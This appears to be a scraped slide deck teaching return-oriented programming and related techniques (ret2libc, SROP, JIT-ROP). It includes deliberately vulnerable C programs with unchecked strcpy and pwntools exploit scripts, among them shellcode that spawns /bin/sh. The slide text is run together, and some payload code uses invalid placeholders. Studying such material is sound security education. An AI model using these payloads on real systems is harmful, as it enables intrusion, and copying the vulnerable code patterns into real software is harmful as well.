Rop and it's friends
Transcript of Rop and it's friends
![Page 1: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/1.jpg)
ROPand it’s friends BY Rakesh Paruchuri
![Page 2: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/2.jpg)
CONTENTS
> WHAT IS ROP> THE NEED FOR ROP > ROP vs RET2LIBC> FRIENDS
![Page 3: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/3.jpg)
what is rop?
→ return oriented programming→ take advantage of buffer overflow→ gain control over instruction pointer→ chain them with gadgets
![Page 4: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/4.jpg)
NEED FOR ROPTO EXPLOIT CODE WE NEED
CODE EXECUTIONOVERFLOW BUFFER ON THE STACK GET CONTROL OVER EIPOVERWRITE SAVED RETURN ADDRESS
![Page 5: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/5.jpg)
LET’S GIVE A TRY
#include<stdio.h>int main(int argc,char **argv) {
char buffer[50];strcpy(buffer,argv[1]);return 0;
}
![Page 6: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/6.jpg)
Exploit:from pwn import *payload = ''payload += '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh'payload += 'A'*16payload += p32(0xffffd676)
print payload
![Page 7: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/7.jpg)
Return To Libc
NX: Protection mechanism aimed to NOT EXECUTE STACK But can corrupt stack and control EIP
why not point eip to something which can create shell
![Page 8: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/8.jpg)
Return To Libc
→ assuming libc is static (ALSR OFF)→ padding “blah blah” into buffer to reach eip → overwriting &system into saved eip→ supplying “/bin/sh” as argument
![Page 9: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/9.jpg)
LET’S GIVE A TRY
#include<stdlib.h>int main(int argc,char **argv) {
char buffer[50]; strcpy(buffer,argv[1]); return 0;}
![Page 10: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/10.jpg)
→
![Page 11: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/11.jpg)
EXPOIT
from pwn import *payload = ''payload += 'A'*54payload += p32(0xf7e48190) # &systempayload += 'BBBB' payload += p32(0xf7f68a24) # &’/bin/sh’
print payload
![Page 12: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/12.jpg)
ROP
ASLR Protection mechanism aimed to randomize the addresses of Shared libraries and virtual memory
![Page 13: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/13.jpg)
What is rop??
→ return oriented programming → re-use pieces of code from code segment→ assemble all pieces into desired shell code
![Page 14: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/14.jpg)
GADGETS
gadget is any instruction sequence ending with RET instruction
ret = pop eip
![Page 15: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/15.jpg)
EXAMPLE FOR GADGET
→ store several values in registers→ you don’t lose control over EIP because of @RET instruction at the ending of the gadget
![Page 16: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/16.jpg)
corresponding code for the gadget
payload += p64(0x401093)payload += p64(0xrbx)payload += p64(0xrbp)payload += p64(0xr12)payload += p64(next_gadget)
![Page 17: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/17.jpg)
LET’S GIVE A TRY#include<stdio.h>
static int flag;
void vuln_function1(){ flag++;}
void vuln_function2(){ if(flag == 1) system("/bin/sh");}
int main(int argc,char **argv) { char buf[50]; strcpy(buf,argv[1]); return 0;}
![Page 18: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/18.jpg)
EXPLOITfrom pwn import *
payload = ''payload += "A"*54payload += p32(0x0804844d) #address of vuln_function1payload += p32(0x08048536) # pop ebx ; ret payload += p32(0xdeedbeef)payload += p32(0x0804845f) #address of vunl_function2
print payload
![Page 19: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/19.jpg)
ROP vs RET2LIBC
RET2LIBCROP
![Page 20: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/20.jpg)
SROP
→ less number of gadgets→ building shell code by chaining system calls→ attackers set up fake signal frames and initiate and returns from signals that the kernel never delivered
![Page 21: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/21.jpg)
exploiting rop registers
eip
esp
![Page 22: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/22.jpg)
exploiting srop registers
eip
esp
![Page 23: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/23.jpg)
exploiting srop registers
eip
esp
![Page 24: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/24.jpg)
exploiting srop registers
eip
esp
![Page 25: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/25.jpg)
JIT-ROP
→ Fine-grained address space layout randomization→ offset keeps varying → requires a information leak→ chaining of gadgets must be done at run time
![Page 26: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/26.jpg)
→ executing shellcode in stack→ ret2libc→ rop→ srop & jit-rop
![Page 27: Rop and it's friends](https://reader035.fdocuments.us/reader035/viewer/2022081604/587a72f81a28abf0468b46ff/html5/thumbnails/27.jpg)